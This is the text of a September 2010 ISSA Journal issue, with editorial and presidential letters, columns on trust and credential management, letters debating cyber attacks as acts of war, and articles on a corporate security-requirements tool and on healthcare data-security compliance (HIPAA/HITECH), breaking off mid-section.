ISSA Journal – September 2010

 

Welcome to the September Journal

Thom Barrie – Editor, the ISSA Journal

 

I watched a movie the other night, one focusing on the U.S. military presence in Iraq. While it had a lot to say politically, and the action was non-stop, what really struck me was ever-present network connectivity: there were laptops, desktops, and smart phones; real-time links between helicopters, ground forces, and headquarters. What was utterly apparent was the total dependency on C-I-A (the InfoSec triad, not the folks in dark glasses) on the battle field, especially for anyone with an InfoSec point of view.

Last issue I pointed out that the nation-on-nation question of cyber espionage/terrorism/aggression was rife within the pages of our Journal. While this month’s articles do not delve into that question, there have been a number of responses. See the “Letters and Discussions” on page 8. This continues to be a hot topic, one with deep ramifications.

Bil Bragg presents an interesting look at penetration testing – on civilian systems. What bothers me is the apparent simplicity of the attack vector (the usual suspects), and while I would hope military-grade software has been thoroughly tested, software is software. And I wonder how often defense contractors “hurry” the product out the door to get it operational with the intent of fixing things as they come along. That may “work” in the commercial space, but not in the nation-nation space where “mission-critical” applications spell life and death, where a breach can expose assets and DoS can render a defender defenseless.

ISSA continues to be in the middle of the discussion. Let’s continue to raise the bar.

 –Thom

 

From the President

Hello ISSA members

Kevin L. Richards, ISSA International President

 

In just a couple weeks, the ISSA International Conference will convene in Atlanta, Georgia (September 15-18). The Conference Committee, the Chapter Leaders Congress Committee, and the ISSA headquarters staff have pulled together a world-class event that will combine great educational content, peer collaboration, information security executive briefings, and an opportunity to recognize the exemplary efforts of our member volunteers and contributors to our profession. If you haven’t had an opportunity to register, there is still time! Details can be found in the included Conference Guide as well as www.issaconference.org.

We will also be having our ISSA Annual General Membership Meeting on September 8. To better reach our global community, we will be meeting virtually. Invitations and meeting details have been sent to all members in good standing over the last couple months. It is important to register, so if you haven’t done so, CLICK HERE for registration details. The goal of this meeting is to provide our members with a review of the ISSA’s activities over the last year, and discuss milestones and key events. And per our bylaws, the General Membership Meeting also provides the transition of the exiting Board members to our newly elected volunteer leaders. Our new incoming Board members are Mary Ann Davidson, Steve Hunt, and Nils Puhlmann.

While I know I mentioned this last month, I wanted to once again recognize departing Board members Frederick Curry, Owen O’Connor, and Scott Williams for their contributions and tireless commitment to the ISSA. These three exemplify the spirit of our Association – we’re looking to find ways to keep them actively involved!

Looking forward and continuing as your ISSA International President, my next term will focus on a few guiding principles. Our efforts need to:

·      Help our members achieve their personal and professional goals

·      Maximize the value of being an ISSA member

·      Identify, develop, and expand forums for our members to collaborate and exchange ideas

·      Grow the brand and visibility of the ISSA internationally

·      Make the ISSA central and relevant to the debates that drive our profession

·      Capture the spirit, the passion, and the experiences of our members to guide the future generations of information security professionals

It is through these principles that we are able to transcend from being a collection of chapters within a common name to a trusted global community that drives our profession and enriches the lives of our members.

One of the strengths of our community is the depth of professionals who volunteer for various ISSA activities. Our volunteers include chapter officers and committee members (see pages 10 and 27 for a list of members), meeting presenters, conference organizers, and those assisting at chapter meetings – there are many ways to contribute to the ISSA.

In closing, please join me in welcoming the newest ISSA chapters, Southern Tier of New York and Mountaineer (Fairmont, West Virginia).

I look forward to seeing you at the ISSA International Conference or at one of the upcoming events, and thank you for making the ISSA the pre-eminent, trusted, global information security community.   

– Cheers!
    Kevin

 

Columns _____________________________________

 

Sabett’s Brief

Trust: Everyone’s Killer App for Next Year?

By Randy V. Sabett – ISSA member, Northern Virginia, USA Chapter

 

A friend of mine recently sent me an email stating that Mars would appear as big as the Moon on August 27. She knew that my son and I enjoy astronomy. The next day, I got the “Sorry, just found out that was a hoax” email. It was very small reminder about the importance of former U.S. President Ronald Reagan’s famous line, “Trust, but verify.”

Trust is important in many verticals, including banking, law(!), and online commerce. The IT industry has been talking about it for years. In June, the government released the NSTIC (the National Strategy for Trusted Identities in Commerce). It mentions trust over 100 times. I now see many commentators talking about trust being the “killer app” of 2011 and, not unexpectedly, vendors jumping on board. I think back to the mid-90s and one of my colleagues saying, “Next year is the year of PKI and it’s always going to be that way.” Now, I’m not saying that trust will go the way of PKI as a potential application (after all, neither one is), but I think that it’s really important to realize that trust is not a binary concept. You cannot represent it solely with a bit (who recalls the X.509 “nonrepudiation bit” from the mid-90s?)

Instead, trust must be viewed as a summation of several different factors. These can include the security of the communications medium, the level and type of the transaction, any explicit mechanisms used to provide security, and the reputation and familiarity of the other party. Not all of these can be automated for every possible transaction. Even when automation of trust occurs, one must still be careful. The phishing and spearphishing attacks that have been launched over the years all rely on establishing misplaced trust.

The practice of law involves issues that usually present themselves as some shade of grey; very little is black and white, particularly in the areas of cyberlaw and data security law. Thus, I am very familiar with working on issues involving shades of grey. Doing so requires analysis and balancing of multiple sub-issues. The same is true with the concept of trust. Would you trust a vendor that you have never heard of and that has very little history in Internet transactions for the purchase of a $14,000 suite of specialized computer hardware and related software? How does the answer change if you started out with some $200 purchases of accessories and then a few $1900 purchases of specialized computers? What if you find that there are reputable independent ratings of the company?

On a personal note, I trust Internet vendors up to differing amounts, depending on my own calculus. When searching for a new notebook a couple of years ago on an online marketplace that included a “feedback” rating for each seller, I came across a very good deal (but it wasn’t a stellar, unbelievable deal - those tend not to be trustworthy). I exchanged several emails with the seller who had a very good feedback rating, but when I asked about payment methods, the response was “just wire us the money directly.” The emails then got progressively more strange (from “it’s a really good machine; wire us the money immediately or it may not be available” to “we are only a small shop and can’t accept credit cards” to “do you not trust us?”) I then talked to one of my forensic friends who said that she was working with law enforcement on a crime ring whose pattern was to establish a good feedback rating over several years and then use that to defraud purchasers who were trusting that rating when making bigger purchases. Thankfully in that case I “trusted but verified”….and so should you in all of your dealings. The lesson here: do your diligence. Don’t be lazy. Take the time to check out the entities with whom you deal…and don’t just rely on the next killer app.

About the Author

Randy V. Sabett, J.D., CISSP, is the co-chair of the Internet & Data Protection (IDP) practice group at Sonnenschein Nath & Rosenthal LLP, an adjunct profes sor at George Washington University, and a member of the Commission on Cyber Security for the 44th Presidency. He may be reached at rsabett@sonnenschein.com.

 

 

 

Herding Cats

Trusting Trust

By Branden R. Williams – ISSA member, North Texas, USA Chapter

 

The business of information security simply does not work without trust. Trust in systems, trust in data, and trust in third parties are critical to making the entire information security ecosystem function well.

Truly secure systems are not always functionally effective. For example, one old information security adage is the only secure computer is the one that doesn’t exist, or is encased in tons of concrete, or whatever you want to throw in there. Essentially, a computer that is totally secure won’t be very functional (if functional at all). Introduce the concept of trust, and while we cannot 100% eliminate a security threat, we can certainly get most of the way there and allow the machine to function.

The concept of trust allows the entire computing ecosystem to create centers of excellence around discrete areas of information security. For example, millions of people use one of the most visible signs of trust virtually every time they go online – the SSL-enabled web browsing session. As a user, I trust that when I go to my favorite website and enter in data like my payment card to purchase goods and services, the website on the other end is actually what I think it is. Of course, we also use the session to encrypt and protect the data in transit, but one of the basic functions of SSL is to authenticate the site name as valid. A trusted third party, a Certificate Authority that is implicitly trusted by users, creates and signs a certificate that is loaded into the web server and matched with a key. If everything checks out, you can trust that the server is what you think it is.[1]

The system works well when everyone plays their part well.

What if we didn’t have trust? Imagine if you as a user had to somehow validate that the online store you were browsing actually belonged to the store at which you were shopping. Depending on the server’s or store’s location, I am sure some kind of travel would be required. Instead, you trust that a closed lock or green bar in your browser means you are safe.[2]

Diving deeper, we arrive at the concept of trusted computing. While largely developed by the Trusted Computing Group,[3] the concept itself could take certain elements that are considered open today, and close them down in a manner that would do more to eliminate viruses and malware than any antivirus vendor ever could. Imagine you could provide electronic copies of documents, and through a trusted computing infrastructure, demonstrate the non-repudiation required to prove without a shadow of a doubt that a certain person viewed, edited, accepted, and signed said documents – all electronically. Definitely sounds a little Big Brother to me, but depending on how it was implemented, it could be quite functional and efficient.

We can take certain elements of security for granted with trust. Provided we can demonstrate that the systems are operating within their limits and as predicted, we can assume that certain functions are handled for us.

Trust can also be used to protect intellectual property. With fully functional Digital Rights Management (DRM), it is conceivable that electronic information theft could be reduced or completely eliminated. Instead of remote hacking, we might see a resurgence of studies on compromising emissions, or TEMPEST. That would certainly change the landscape a bit to reinforce physical security and the use of Faraday cages to protect our information versus firewalls and antivirus. Granted, I am painting an extremist view of what the world could look like, but the reality is that the amount of investment and environmental change required to execute that vision is not practical for most businesses. It would need to be built into the systems we use today and in the future to be something we leverage as part of our overall IT strategy.

None of this, of course, would be possible without our little friend, trust.

About the Author 

Branden R. Williams, CISSP, CISM is the Director of the Global Security Consulting practice at RSA, the Security Division of EMC, and regularly assists top global retailers, financial institutions, and multinationals with their information security initiatives. Read his blog, buy his book, or reach him directly at http://www.brandenwilliams.com/.

 

 

Crypto Corner

Beyond Key Management

By Luther Martin – ISSA member, Silicon Valley, USA Chapter

 

Encryption can provide essentially unbreakable security, but it provides security that is only as strong as the key management that supports it. Key management, in turn, is only as strong as the credentials used to authenticate users, and weak credential management can undermine the strength of key management just as easily as weak key management can undermine the strength of encryption. In either case, the protection provided by encryption can be reduced from being essentially unbreakable to being very weak.

But while it is fairly well known these days that strong key management is needed for encryption to be strong, the fact that strong credential management is needed for key management to be strong is not as widely understood. Let’s take a first step towards changing this.

Key management

A cryptographic key is much like the combination to a safe: if you have the right combination, it is easy to open a safe, but it is hard to open one without it. Similarly, if you have the right cryptographic key, decrypting encrypted data is easy, but decrypting it is impractical without this key.

If you are careless enough to let someone else learn the combination to your safe, however, the protection provided by the safe is compromised. Similarly, cryptographic keys need to be handled carefully. If you are careless with them, then the protection provided by encryption can be essentially eliminated. Key management covers all the details of how to ensure that this does not happen, including how to securely generate, transport, store, use, and destroy keys. It ensures that you do not do the cryptographic equivalent of writing the combination to your safe on a Post-it™ note and sticking it to the wall next to your desk.

But even if you have robust key management, it is still possible to have weak security. Part of using cryptographic keys securely is ensuring that they are only given to authorized users. If an adversary can masquerade as an authorized user, he can get keys as easily as an authorized user can, so it is also important to securely manage the authentication credentials that key management system uses.

Credential management

A useful analogy for credential management is with identity theft. If a hacker can steal your identity, then for all intents and purposes he is you: he can open fraudulent bank accounts in your name, buy a house or car in your name, etc. Similarly, in an enterprise computing environment, if a hacker can get the authentication credentials for an authorized user of a key management system, then he can get keys just as easily as the authorized user can.

Unfortunately, existing key management standards (including draft standards) do not address the issue of credential management. They assume authentication takes place to ensure that keys are only granted to authorized users, but they do not specify how to do this securely. This means that it is possible to fully comply with the best practices that key management standards define yet still have minimal security.

More than just encryption

Note that the strength of credential management limits the strength of technologies other than encryption. If you are using tokenization to eliminate cardholder data from your systems, for example, then the security provided by the tokenization is limited by the strength of the authentication credentials that the tokenization system uses. If a hacker can authenticate as an authorized user to the tokenization system then he can easily convert a token back into the plaintext data that it represents. If this happens, the security provided by the tokenization is essentially eliminated.

So just like it does not make sense to accept that encrypted data is safe without looking more closely at the security of the supporting key management, it does not make sense to accept that tokenization is secure without looking at the security of the supporting credential management. With both technologies, the security provided by a complete data protection solution is limited by system-level issues instead of the technologies themselves; and to ensure that sensitive data is protected, those are the issues that need to be addressed.

Because of this, information security professionals should focus their efforts on ensuring that credential management and key management are done securely and worry less about arcane arguments about the strength of encryption algorithms or the security of tokenization schemes. That is the best way to ensure that sensitive data gets the protection that it needs.

About the Author

Luther Martin is the Chief Security Architect for Voltage Security. You can find his daily thoughts on information security at http://superconductor.voltage.com and can reach him at martin@voltage.com.

 

Letters & Discussions

To the Editor

When does Electronic Espionage or Cyber Attack Become an “Act of  War”?

The problem with David Willson’s article in the August ISSA Journal is that it presumes “war” means the same thing in cyberspace as in real spaces, and he is focusing on  the possibility of cyber events causing armed response and conflict.

I propose that acts of aggression in cyberspace should be characterized outside of war in its traditional definition. It is closer to real space “terrorism” and “piracy.” There are no nation-states in cyberspace, and both terrorists and pirates act outside the bounds and intent of nation-states. While there are citations showing how countries have been attacked, the attacks are essentially economic (only similar to a “cold war”). We need to define a term for this: cyber terropirates?

More direct to the author’s point, there needs to be change to international laws to encompass cyber aggression within piracy, for example. The piracy issue is addressed by international task forces. Would not cyber-piracy (on order of act of aggression) also warrant international task forces?

A few points:

·      Cyberwar is not warfare; closest to piracy. We need a definition and a term.

·      If there is not a standard for this in U.S. or international law, then existing statutes should be extended (possibly “law of the seas” regarding piracy) to encompass these cyber acts of aggression (cyber-piraci-terror thing). Think of creating a common “law of the cyberseas.”

·      The result would be many fold: definition, understanding, international patrolling/response (like the joint task forces patrolling off Somalia), and a deterrence of nation-states from armed retaliation to cyber aggression.

Brett Osborne, CISSP+CISM
ISSA Member, Central Florida, USA Chapter
itdefpat@gmail.com

 

Brett, I agree in part.  

Cyberspace has created many unique situations and scenarios.  I agree with cyber terrorism or piracy but strictly when it is sole actors or non-state actors.  The consensus is that the attacks on Georgia and Estonia, and other attacks, were carried out by or at least condoned by the Russians.  If it is state on state, then it could quite possibly be an act of “war” or more appropriately act of aggression under international law, allowing for the victim nation to strike out in self-defense.  Additionally, many nations, to include the U.S., have or are incorporating cyberspace attacks and weapons or tools into their military arsenal.  It makes a lot more sense to disrupt or deny your opponent’s early warning, weapons, or communications systems prior to any conflict thus giving you the upper hand.  So, the distinction is whether the person or persons attacking are terrorists, criminals, or state actors.  Which raises one of the issues I covered in the article. The difficulty of attribution in cyberspace is what makes it so attractive to many and frustrates most victims in cyberspace. I guess I could have made more of a distinction in the article between the various types of “bad actors” in cyberspace. Thank you for the comment, very insightful.

Concerning international cyberspace, please see my article, “A Global Problem: Cyberspace threats demand an international approach,” ISSA Journal, August 2009.

David Willson
ISSA member, Colorado Springs, USA Chapter
willson.david.l@gmail.com.

 

 

Feature Article

 

Cybersecurity Engineering: The Requirements Tool Advantage

By Jeff Fenton, ISSA member, Silicon Valley, USA Chapter and Richard Tychansky

 

This article shows how an organization can benefit from making security requirements accessible through a custom web application to Information Assurance Engineers, System Engineers, Application Developers, and Internal Auditors.

 

Abstract 

Compliance with the requirements of an organization’s cybersecurity policy framework is the basis for building trusted systems and applications. This article shows how an organization can benefit from making security requirements accessible through a custom web application to Information Assurance Engineers, System Engineers, Application Developers, and Internal Auditors. The tool advantages are faster requirements search and allocation, requirements traceability to external standards (e.g., ISO 27001 and NIST SP 800-53, Rev 3), and real-time alignment to organizational policy. The tool and process have been developed in-house and are being applied successfully at Lockheed Martin Corporation.

 

An organization’s policies provide a strong foundation for trust. Cybersecurity policies provide the foundation for information security governance by enabling security program development and management. They also constitute the basis for establishing both risk management and compliance measurement frameworks to meet business needs. Importantly, they provide detailed requirements that must be allocated to the development of systems and applications. Security requirements reflect an organization’s response to relevant sector-based laws, regulations, industry standards (e.g., ISO 27001[4] and NIST SP 800-53[5]), best practices, and common security vulnerabilities and exposures. The requirements become reusable project components, which support the IT value proposition of “building security in.”

Traditionally, though, the problem has been that to build security into a system or application an engineer needed to be aware of the organization’s cybersecurity policy requirements. As the regulatory landscape and threat level changed, so did the requirements. An application interface to the policy-making environment is needed to provide engineers the ability to extract and collate relevant, current requirements. This would advance the organization’s system development process to help build business trust to the level where it becomes a competitive advantage. Lockheed Martin developed in-house and deployed a requirements management tool and process to promote building security in.

Cybersecurity policy foundations

IT governance for an organization must include cybersecurity policies in order to maintain customer trust and regulatory compliance. Where is the appropriate place in an organization’s policy hierarchy to place cybersecurity policies so they would apply to all business areas and not be focused upon a single business element?

A typical policy hierarchy may include high-level Corporate Policy Statements (CPS), more detailed Corporate Functional Procedures (CFP) applying to the entire organization, and finally discrete Business Area/Business Unit policies (Figure 1). The application of policy is top-down (i.e., CPS to CFP to Business Area/Units). Policy supplements by Business Area/Units do not flow back up the hierarchy or laterally across to other business areas, because of the need to maintain IT governance stability and accountability at the top level of the organization.

Top-level CPS statements represent senior management’s overall commitment to build trust in the organization and include the conceptual foundation for cybersecurity in the organization. Specific cybersecurity policies are then implemented as a Corporate Functional Procedure called the Corporate Information Protection Manual (CIPM). Notably, the CIPM can also be referenced by the Business Areas/Units and be supplemented with additional requirements (i.e., security controls) to establish or maintain a specific business information assurance objective (i.e., confidentiality, integrity, and/or availability). The CIPM enables trust by providing a baseline of specific security control requirements for information systems and applications. The CIPM is comprised of three unique policy objects: Directives, Standards, and Guidelines (Figure 2).

High-level requirements in the form of directive statements are focused on key information security objectives for the organization. Standards contain detailed requirements for various information security topics under each of the directive statements. Together with the directive statements, standards present issue-specific policy on the topic areas. Guidelines are advice, recommendations, and best practices. Guidelines can include recommended alternative methods for meeting requirements.

The CIPM Security Policy Framework (SPF) has been shown to align to ISO 27001 and NIST SP 800-53, Revision 3 security control objectives and requirements. CIPM policy mappings have supported ISO 27001 certification and an assessment of the CIPM for control gaps when compared to NIST SP 800-53, Revision 3.

When initially implementing the CIPM SPF, all supporting policy artifacts were imported into a requirements management tool. This tool then formed the basis for the development of a Security Policy Management System (SPMS). Each directive became a top-level requirement, with child requirements for directive statements. Each directive statement then has one or more standards and/or guidelines as child requirements. Each standard itself also has child requirements, and likewise each guideline has similar child requirements for advice and recommendation statements. Records in the SPMS were created for additional supporting artifacts (supplementary documents, forms, and figures) which are associated with standards and guidelines.

Within the SPMS, each policy object has attributes including effective date, last reviewed date, status (draft or approved), role metatags (system administrator, database administrator, network administrator, system engineer, etc.), topic metatags (email, firewalls, passwords, routers, etc.), and change history. Each policy object also includes any applicable traceability to external standard requirements (e.g., ISO, NIST, and industry specific standards such as PCI DSS[6]).

A formal Information Security Policy Development Process (IS-PDP) (Figure 3) was implemented to facilitate updates to the CIPM and ensure that policy changes are captured in the SPMS. The entire process for a policy change typically takes 12 weeks, and can be accelerated to support more time-sensitive business needs. Each IS-PDP phase takes approximately 1-2 weeks; drafting can take 2-4 weeks or longer depending upon the complexity and involvement of Subject Matter Experts (SMEs).

The organization’s Corporate Information Security (CIS) group works closely with the CIPM Change Review Board (CRB), which includes representation from each Business Area (BA) within the organization. Each BA has an Information Security Officer (BA ISO). The BA ISOs are the advocates for CIPM change and evolution to ensure risk is addressed appropriately for their business areas. Employees in each BA are encouraged to contribute CIPM Change Requests (CRs) to their respective BA ISO.

CRs are typically submitted to an intranet collaboration website where they are then assigned a tracking identifier for referencing comments and work products. The BA ISOs and their respective constituents participate in CR reviews before any proposed CIPM change is formally accepted. Reviews of any new cybersecurity requirement will consider the business need to balance risk and operational impact.

The policy development process engages stakeholders and balances risks and benefits to deliver policies that realistically support business needs. Sound policies, easily understood and readily applied, help to build trust by customers, system users, and across the supply chain. Customers are more confident in the organization’s ability to deliver when policy builds the foundation for a quality process. While policies often sit on a shelf, the CIPM SPF makes them readily accessible, easily usable, and an integral part of the business.

Building the CIPM iQ interface

A static view of corporate policies and functional procedures is not conducive to search and allocation of requirements for specific projects. A static view can also become outdated and introduce risk to projects. To further enhance the value of policy, policy users need an interface to the requirements; thus, an additional web application was envisioned to facilitate building security into systems and applications with a dynamic view of policy. The need for system engineers and application developers to build compliant solutions for customers led the CIS group to build a custom web application to interface directly with the CIPM Security Policy Management System (SPMS).

The tool is named CIPM InfoQuery (iQ) and is an internally developed web application using Java Server Pages (JSP) technology[7] to create the dynamic presentation layer views of cybersecurity policy. Java servlets were used for the business layer and an SQL database for the persistence layer.

CIPM policy objects are accessed by the Java application directly with an API call to the SPMS instead of making direct queries to the policy requirements management system. The data is then converted to Java objects and saved on the web server in XML format. An overview of systems architecture is given in Figure 4.

The architecture supports two views of the organization’s cybersecurity policy: one static – published policy (Command Media) view, the other dynamic - CIPM iQ. Now, when a policy update is published, it is available in real-time to system engineers as discrete searchable policy objects, which can then be allocated to requirements collections for projects.

Users can create collections of requirements with the “My iQ” feature of CIPM iQ. Team members can now take action on being accountable for compliance by contributing to a project’s requirements collection. Collections can be shared with a project team and rights can be assigned to view, edit, and update the security requirements package.

The CIPM iQ requirements tool advantage

CIPM iQ has proven to be an effective tool for system security engineers and internal auditors when they need to identify quickly the cybersecurity compliance requirements for projects. Each CIPM requirement is written in proper system engineering style, ready for engineers to apply and “build security in” to systems. The organization’s Global Supply Chain Management and Legal teams also realize an advantage when referencing the tool to help them define contractual requirements with business partners. CIPM iQ makes cybersecurity policy accessible to everyone in the organization, which promotes awareness of the organization’s compliance requirements. The interface (Figure 5) is user-friendly and supports basic and advanced searches, as well as the more advanced collections feature.

CIPM iQ leverages the security policy framework, including the use of metatags for each policy object (see the “Subject Index” in Figure 5). The tool also enables users to search, based on document type (i.e., directive, standard, or guideline) and on any keyword within a policy object.

Conclusion

“Building security in” is an engineering paradigm that is applied to the design of information systems and applications. With the deployment of a custom web-based application (CIPM iQ), cybersecurity requirements are searchable and are more easily allocated to programs/projects throughout any phase of the System Development Life Cycle.

·      The business advantages of creating CIPM iQ to support cybersecurity requirements compliance are that it:

·      Demonstrates to external customers and partners that the organization has established an effective end-to-end organization-wide information security management system

·      Enables efficient management of dynamically changing cybersecurity requirements

·      Enables project compliance assessments by auditors

·      Enables compliance assessments across multiple security standards

Future enhancements for the tool will be based upon an analysis of security engineering and project management use cases. The tool is envisioned to support standard engineering process improvement by allowing for the reuse of common controls for the organization as well as supporting automated compliance efforts to reduce the cost of engineering trusted systems and applications.

About the Authors

Jeff Fenton, CISSP, ISSEP, ISSMP, CISM, GBLC, CBCP, is a Sr. Staff Information Assurance Engineer with Lockheed Martin’s Corporate Information Security organization. His responsibilities include corporate cybersecurity policy and standards. He may be reached at jeff.fenton@lmco.com.

Richard Tychansky, PMP, CISSP, ISSEP, CSSLP, CAP, CISA, CISM, CGEIT, CRSIC, CRMP, has over 15 years experience assessing and managing risk in cybersecurity programs. Currently, he is shaping cybersecurity policy evolution at Lockheed Martin Corporation by leading an alignment to NIST and ISO/IEC standards. He may be reached at richard.s.tychansky@lmco.com.

 

 

 

Information Protection Framework: 

Data Security Compliance and Today’s Healthcare Industry

By Bindu Sundaresan and Carisa Brockman

 

Today’s healthcare industry is facing complex privacy and data security requirements. This article shows that organizations must be equipped with an information protection strategy that is inclusive of security, privacy, and risk management solutions.

 

Abstract

Today’s healthcare industry is facing complex privacy and data security requirements. The movement from paper to digital records of health information is accelerating, making it ever more important that information be protected. Organizations must be equipped with an information protection strategy that is inclusive of security, privacy, and risk management solutions.

 

Over the last several years, a number of laws and regulations have been adopted which impact the use of information in the healthcare industry.[8] The Health Information Technology for Economic and Clinical Health Act (HITECH), part of the American Recovery and Reinvestment Act of 2009 (ARRA), was signed into law with the goals of developing a healthcare IT infrastructure, encouraging entities to adopt Health Information Technology (HIT), to “meaningfully use” Electronic Health Records (EHRs), and to protect the privacy of the consumer.

ARRA also modified the Health Insurance Portability and Accountability Act (HIPAA) in several ways: it made portions of HIPAA directly applicable to Business Associates; it gave patients broader rights to an accounting of disclosures, including those for Treatment, Payment, and Operations (TPO); it modified and expanded obligations for breach notifications, both by Covered Entities and Business Associates; it strengthened the privacy rights of patients; and it gave certain federal and state entities greater authority over compliance and enforcement.

This legislation and associated regulations require affected entities to do a variety of things, such as:

·      Review and potentially modify their privacy and security policies

·      Implement and update employee training programs

·      Develop breach notification protocols

·      Maintain and follow internal audit plans

·      Modify existing data sharing arrangements that are no longer permissible

·      Be prepared for external audits

Healthcare information flows

The flow of healthcare information follows the patient, starting at the doctor’s office, to laboratories, imaging centers, pharmacies, and other care facilities (Figure 1). This natural flow of medical records provides many points where information security must be considered and proper processes implemented.

The increasing interconnection, while extremely beneficial for patient healthcare, also raises risks related to patient privacy and confidentiality. There is a heightened consumer awareness regarding privacy of sensitive information, and the potential impact of reported data breaches has caused consumers to expect and demand protection of their personal health information.

As healthcare operations benefit from advancing technologies which promote information sharing, it is necessary to build and use the appropriate information protection framework to preserve the integrity and protect the confidentiality of Protected Health Information (PHI) and Personally Identifiable Information (PII).

Health information protection framework

To enable effective and secure information sharing, healthcare organizations require a transparent, consistent ability to identify information sensitivity and determine proper handling. This is achieved by developing an information protection strategy and framework that is comprehensive, but flexible enough to meet changes in healthcare infrastructure while achieving compliance requirements. As many organizations have learned, focusing on one set of compliance requirements at a time does not assist in building a comprehensive framework or strategy; it only increases the amount of time and resources which organizations have to spend on meeting requirements.

The information protection strategy/framework should look at a broad set of protection requirements including specific internal security and privacy requirements, risks to the business, applicable compliance requirements, and industry standards (Figure 2) .

Risk management: Integral to security and compliance 

Healthcare organizations are required to conduct risk assessments as per the HIPAA security rule on a periodic basis to identify data security risks and implement appropriate security controls for their particular organization and can use the resources that have been provided by the Department of Health and Human Services (HHS) as a good starting point.

Healthcare organizations must perform ongoing risk assessments to identify the risks that could compromise their data and determine what the potential effects of the risk could be, based upon the environment in which they operate.[9] This can guide healthcare organizations in making intelligent and informed decisions about how to allocate security resources to protect customer or patient data and ensure compliance.

Adopt a well-defined risk assessment framework that can help you identify and address the risks that are pertinent to your organization.

Risk assessment in general has many definitions in the industry today. Some view risk assessment as merely a checklist/questionnaire and consider it to be a one-time effort. Others have a deeper view of risk assessment and consider it to be a useful tool in identifying the controls that need to be put in place to maintain the security posture of the organization. In today’s business operations, where information is critical to the success of a business, a solid risk assessment framework must be in place in order to help with efficient risk management.

Risk in this context can be defined as the impact and likelihood of an adverse event. With respect to healthcare data, the impact and likelihood of an adverse event depends on the amount and sensitivity of the health information and the number of people or systems having access to that information. For example, an individual physician’s office with one system, not connected to a network storing sensitive health information, creates less exposure and decreases the risk of the information being compromised, while a large medical provider with an extensive health information exchange infrastructure and various members accessing and handling the information creates a greater risk of the information being compromised.

Establish an information risk management program which allows your organization to address strategic and technical risks to information security.

Risk management: Guidance

The Health & Human Services Office of Civil Rights (OCR) published draft guidance on risk assessments to help healthcare organizations understand what is expected of them in doing a risk analysis of their patient’s PHI.[10] The HHS Office of the National Coordinator (ONC) also produced a security practice guide for small healthcare practices[11] that serves as a primer for healthcare providers who need to understand the basic security considerations relevant to their practices. The guidance material also includes a number of references to more detailed information and further guidance.

The OCR calls risk analysis the “first step” to identifying and implementing safeguards that comply with and carry out the standards and implementation specifications in the HIPAA security rule.

People, process, and technology: Key elements of security and compliance

Companies handling Protected Health Information/Personal Identification Information (PHI/PII) should perform an architectural and program review to understand how their existing controls can be utilized to address identified risks before making new investments. When determining the best information protection strategy, they should review their current healthcare infrastructure to understand existing measures and processes. There should be ways to optimize, reduce costs, or minimize upcoming investments. For every compliance initiative there are technologies that promise to provide the easiest method of complying with the requirements. Most likely, companies already have some of the technologies in place to satisfy the other compliance initiatives such as Payment Card Industry-Digital Security Standard (PCI-DSS), Sarbanes-Oxley Act (SOX), or the Gramm-Leach-Bliley Act (GLBA). Before moving forward, determine a strategy to address compliance requirements using both technological and strategic solutions. Not all requirements can be solved by technology; some are best solved with organizational and operational processes.

Develop an information protection strategy for security and compliance with the right combination of people, processes, and technologies to address your organizational risks.

Data security: Common thread across the industry

Healthcare organizations face a great variety of risks to the security and confidentiality of data and information. Applications and their supporting infrastructure create efficiency, but can also create conflicts between data sharing and data security and confidentiality. The prudent healthcare enterprise in the process of automating application modules must consider system-wide security and confidentiality across application boundaries.

Each organization must determine the level of security and confidentiality for the varying categories of information, including which access to each category of information is appropriate for a user’s job function.

Before analyzing security controls, take a step back to understand what data is actually needed to support the business, how that data must be shared, and where that data is stored. Look at operations, the flow of data into, throughout, and outside of the organization, and the risks associated with the entity’s current business model. This will result in an understanding of the exposures that the data faces, allowing prioritization of security measures.

The risk analysis guidance released by OCR also provides questions as examples that have been adapted from NIST Special Publication (SP) 800-665. These are examples healthcare organizations could consider as part of a risk analysis.

·      Have you identified the electronic protected health information (e-PHI) within your organization? (this includes e-PHI that you create, receive, maintain, or transmit)

·      What are the human, natural, and environmental threats to information systems that contain e-PHI?

·      What are the external sources of e-PHI? (for example, do vendors or consultants create, receive, maintain, or transmit e-PHI)

To understand organizational privacy, security, and confidentiality needs, determine:

·      Which employees should have access to PHI/PII information to perform their jobs

·      Mechanisms to educate and compel (via enforcement) individuals to keep sensitive information confidential

·      Rules for the release of health-related information to third parties

·      Physical barriers and system deterrents to secure data and data processing equipment against unauthorized intrusion, corruption, disaster, theft, and intentional or unintentional damage

·      The location of sensitive data, the data lifecycle, and regulatory requirements which impact the data

Breach response: Before and after

The HITECH Act outlines a number of privacy and security provisions directly applicable to covered entities and business associates regarding breach notification, extending the requirements of HIPAA, and increasing enforcement and penalties. Sections 13402(e)(3) and 13402(e)(4) require that covered entities notify the HHS Secretary immediately of any breaches of unsecured PHI affecting 500 or more individuals and that the Secretary make these breaches publicly known on the HHS website. HITECH Breach Notification Guidance[12] provides detailed steps on how to report a breach.

HITECH defines breach as “the unauthorized acquisition, access, use, or disclosure of protected health information which compromises the security or privacy of such information, except where an unauthorized person to whom such information is disclosed would not reasonably have been able to retain such information.” The Act includes two important exceptions to this definition for cases in which (1) the unauthorized acquisition, access, or use of PHI is unintentional and made by an employee or individual acting under authority of a covered entity or business associate if such acquisition, access, or use was made in good faith and within the course and scope of the employment or other professional relationship with the covered entity or business associate, and such information is not further acquired, accessed, used, or disclosed; or (2) where an inadvertent disclosure occurs by an individual who is authorized to access PHI at a facility operated by a covered entity or business associate to another similarly situated individual at the same facility, as long as the PHI is not further acquired, accessed, used, or disclosed without authorization.[13]

Data breach notification requirements are imposed by a number of state and federal privacy laws. In addition to meeting regulatory requirements for proactive data security, you must also consider reactive notification obligations in the event of a data breach. These obligations need to be considered in advance of, and not after, a data breach.

·      Plan for Breach Detection: To ensure early breach detection, consider aggressive and ongoing monitoring programs that may range from IT audits to checking patient health records for inconsistencies.

·      Plan for Breach Response: A detailed breach response plan should be in place. Consider vendors who provide turnkey notification services, including call centers and postal mail, which have experience creating tailored notification and advisory services for breach victims with special needs, such as age, mental health issues, or physical disabilities. Remediation services for breach victims will help preserve public trust in your organization.

However, these notification procedures can largely be avoided if the PHI has been secured through one of a number of methodologies or technologies. HHS has issued guidance that specifies methodologies and technologies whose use renders information sufficiently unusable. Essentially, use of these methodologies creates a safe harbor, which results in covered entities and their business associates not being required to go through the notification procedures because the information breached is considered secured (secured PHI is unusable, unreadable, or indecipherable to unauthorized individuals).

Regulatory drivers: Changing regulations at the federal and state level

